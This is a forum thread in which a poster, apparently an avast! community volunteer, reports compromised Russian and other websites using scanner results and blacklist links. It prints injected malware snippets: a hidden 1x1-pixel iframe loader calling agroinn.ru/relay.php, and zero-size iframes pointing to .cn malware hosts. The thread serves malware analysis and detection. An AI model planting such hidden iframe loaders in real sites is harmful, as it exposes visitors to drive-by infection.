Again avast! Web Shield detects malicious website...

Viruses and worms
1

See: https://www.virustotal.com/url/cf8aeaa3ab8cee4a2676c2e5d03e3c9f13073eb81ae54ccaf601cc89c543ff05/analysis/
Full report here: http://sitecheck.sucuri.net/results/www.handmall.ru and here: http://urlquery.net/report.php?id=974407

Search results
1.
Гипермаркет handmade

  Warning: Dangerous Downloads
  Посмотреть крупную фотографию: 980 Кб. Муранское стекло Размеры разные, от 16. г. Казань.
  wXw.handmall.ru - Cached  and triggers the Webshield to block JS:Blacole-Bu[Expl]

Avast Shields, you can not go without them,

polonus

2

But the following non-detected site is questionable…as it was found to be 100% malicious here:
http://zulu.zscaler.com/submission/show/b8ab95f1cb3e28d800fecc2ac11a4caa-1360503638
Blacklisted by both Google Safebrowsing and Yandex,
see: https://www.virustotal.com/url/a55940c07f990affdc067717644d470b3999cb90b3cd7bedacffa72fcfdeba03/analysis/
ALL javascripts should be checked, starting with htxp://mega-rip.ru/js/u.ajaxPm.js & htxp://mega-rip.ru/js/ucodes.ru.ajaxmessages3.js (detection credits go to Redleg’s viewer) goes to a block of obfuscated script after document.write and color code…which looks suspicious.
Found generator content that avast! Webshield blocks as JS:Decode-LI[Trj] on ucodes dot ru.ajaxmessages3.js

malicious iFrame on line 19, 86 and 213 list of iFrame included /abnl/?begun=1&l=US&u0=US%7Ca3kg4CK%7C0%7Cs50 (which is not malware, benign code related to an adbanner going to htxp://counter.yadro.ru/hit;ucoznet?r = audistyle code)
for this script at htxp://mega-rip.ru/css/forum_slider.js
I get:

There is no site configured on this address

If you are the owner of the website and continue to see this error after the domain attachment, then the attachment procedure has not been finished. Finish the procedure in the "Domain attachment" section of the Control Panel.

If the domain has just been attached to the site you must wait 15 minutes.

Code hick-up also here:
s50.ucoz. dot et/src/uwnd.js?2 benign
[nothing detected] (script) s50.ucoz dot net/src/uwnd.js?2
status: (referer=mega-rip dot ru/forum/13-343-1)saved 228800 bytes 0dd32c2a8c5e705fa396074714324206987bf33a
info: [iframe] s50.ucoz dot net/src/
info: [img] s50.ucoz dot net/src/
info: [img] s50.ucoz dot net/img/1px.gif
info: [input] s50.ucoz dot net/.s/img/1px.gif
info: [img] s50.ucoz dot net/.s/img/1px.gif
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined variable jQuery.ajaxSettings
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var jQuery.ajaxSettings = 1;
error: line:1: …^
suspicious:
Also consider the 5 potentially suspicious files flagged by Quttera’s: http://quttera.com/detailed_report/mega-rip.ru

polonus

3

The malware script (local file request) for the site analyzed in the previous posting as flagged by urlquery dot net scan is:


function() {
    var c = document.createElement('iframe');

    c.src = 'htxp://agroinn.ru/relay.php'; [going to this code here: https://docs.google.com/viewer?url=zasudili.ru/upload/iblock Bitrix site management code]
          /79e/79ef49ca89c8869c7ff853cc84329308.pdf&embedded=true
    c.style.position = 'absolute';
    c.style.border = '0';
    c.style.height = '1px';
    c.style.width = '1px';
    c.style.left = '1px';
    c.style.top = '1px';

    if (!document.getElementById('c')) {
        document.write('<div id=\'c\'></div>');
        document.getElementById('c').appendChild(c);
    }
})();

polonus

4

DrWeb’s online URL scanner gives the site as clean:
Checking:htxp://trane73.ru/demo/blocks/trane73.bcookie.js
File size:1353 bytes
File MD5:acdc79c0b395c427dc31d14ed82d0743

htxp://trane73.ru/demo/blocks/trane73.bcookie.js - archive JS-HTML

htxp://trane73.ru/demo/blocks/trane73.bcookie.js/JSFile_1[0][549] - Ok
htxp://trane73.ru/demo/blocks/trane73.bcookie.js - Ok

Checking:htxp://s50.ucoz.net/src/jquery-1.7.2.js
File size:92.62 KB
File MD5:775b359b36ef251eee59d9c0e291415c

hxtp://s50.ucoz.net/src/jquery-1.7.2.js - archive JS-HTML

htxp://s50.ucoz.net/src/jquery-1.7.2.js/JSTag_1[1249a][4ddd] - Ok
htxp://s50.ucoz.net/src/jquery-1.7.2.js - Ok

Checking:htxp://s50.ucoz.net/src/ulightbox/ulightbox.js
File size:21.51 KB
File MD5:f15b616fb905e25c1443c608cbdf2662

htxp://s50.ucoz.net/src/ulightbox/ulightbox.js - Ok

Checking:htxp://u-mrx.addflow.ru/mrx.js?p=2
File size:1006 bytes
File MD5:b4d9eda125d935c47d08a61ebdf6a35c

htxp://u-mrx.addflow.ru/mrx.js?p=2 - archive JS-HTML

htxp://u-mrx.addflow.ru/mrx.js?p=2/JSFile_1[0][3ee] - Ok
hxtp://u-mrx.addflow.ru/mrx.js?p=2 - Ok

Checking:htxp://s50.ucoz.net/src/uwnd.js?2
File size:223.44 KB
File MD5:512fa0f362b02fe6a8eda5b26a3f1bc7

htxp://s50.ucoz.net/src/uwnd.js?2 - archive JS-HTML
htxp://s50.ucoz.net/src/uwnd.js?2 - Ok

Checking:htx://mega-rip.ru/forum/13-343-1
Engine version:7.0.4.9250
Total virus-finding records:3657097
File size:26.47 KB
File MD5:6245a764efdd648ad4f0d1f70ed87faa

htxp://mega-rip.ru/forum/13-343-1 - archive JS-HTML

htxp://mega-rip.ru/forum/13-343-1/JSTAG_1[301][be] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_2[e5f][104] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_3[1ba0][f1] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_4[1ea4][3c2] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_5[4fc6][65d] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_6[575c][3e7] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_7[5b75][de] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_8[5fa6][231] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSTAG_9[639b][523] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSEvent_10[fe] - Ok
htxp://mega-rip.ru/forum/13-343-1/JSEvent_11[4b] - Ok
htxp://mega-rip.ru/forum/13-343-1 - Ok

polonus

5

This one is immediately detected by avast! Webshield as infected with JS:Iframe-AAS[Trj] aka JS/iFrame.YU.2
Iframe fs.src = ‘http://www.philchor-nb.de/clk.php’; which is blacklisted http://sitecheck.sucuri.net/results/www.philchor-nb.de/clk.php
Redirect site now been cleansed: http://urlquery.net/report.php?id=527529 more recent: http://urlquery.net/report.php?id=778066
See: https://www.virustotal.com/url/43cb932dc524b4fd6bb6aaf813fdaef131b97abc16f613b953cc5d32b4676c1b/analysis/1360528492/
Detected also here: http://urlquery.net/report.php?id=975937
and http://www.avgthreatlabs.com/sitereports/domain/panik-esports.de/

polonus

6

Here on this site we get 3 IDS alerts: http://urlquery.net/report.php?id=979203
DrWeb URL checker does not alert: Checking:htxp://ttlad.com/it/right6.htm
Engine version:7.0.4.9250
Total virus-finding records:3659107
File size:1719 bytes
File MD5:96c85fc03b7e10f5c4421ed4c9cf9c1c

htxp://ttlad.com/it/right6.htm - archive JS-HTML

htxp://ttlad.com/it/right6.htm/IFrame_1[36] - Ok
htxp://ttlad.com/it/right6.htm/IFrame_2[37] - Ok
htxp://ttlad.com/it/right6.htm - Ok

The scan does not go deep enough: Risky URLs found in: htxp://ttlad.com/it/right6.htm (Quttera detects suspicious)
VirusWatch gives all instances of malware there as dead…

1: htxp://aaa.77xxmm.cn/new858.htm?075
2: htxp://aaa.1l1l1l.com/error/404.html

Content after the < /html> tag should be considered suspicious.


51:
< if​rame src= htxp://aaa.77xxmm.cn/new858.htm?075 width=0 nAme='7126' heIght=0> < /if​rame> < if​rame src= htxp://aaa.1l1l1l.com/error/404.html width=0 name='7126' heIght=0> < /if​rame>

Note: The if​rame above is loading content from a URL currently flagged by Google and should be removed! Credits for detection go out to Redleg!
Read on the SQL injection an article from Dancho Danchev: http://ddanchev.blogspot.nl/2008/05/malware-domains-used-in-sql-injection.html
Logged here: http://bbs.janmeng.com/viewthread.php?action=printable&tid=817414 Log is being generated by FreShow
avast! Webshield detects as HYML:Iframe-Z[Trj]

I get 378 broken links now for htxp://aaa.77xxmm.cn/new858.htm?075 & htxp://aaa.1l1l1l.com/eRRoR/404.html all 404 and bad host links
See: http://www.threatexpert.com/report.aspx?md5=2bf71e2de7f9cfd1b70e37a95d323e6f
http://www.threatexpert.com/report.aspx?md5=09454c8ec9d526121bac9342e7928930

polonus

7

Reported unknown_html for this site → see: http://sitecheck.sucuri.net/results/dc11.ru/
had flash malware recently: http://urlquery.net/report.php?id=994524
line 14 DD_belatedPNG.fix(‘.png, img’); (see: http://www.avastturkiye.com/pda-edition)
and the according attack code: http://xss.cx/2011/06/20/ghdb/dork-xss-reflected-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-bydcom.htm (scanned with netsparker - online cached example)
ad tracking by Analytics Tracking Code

polonus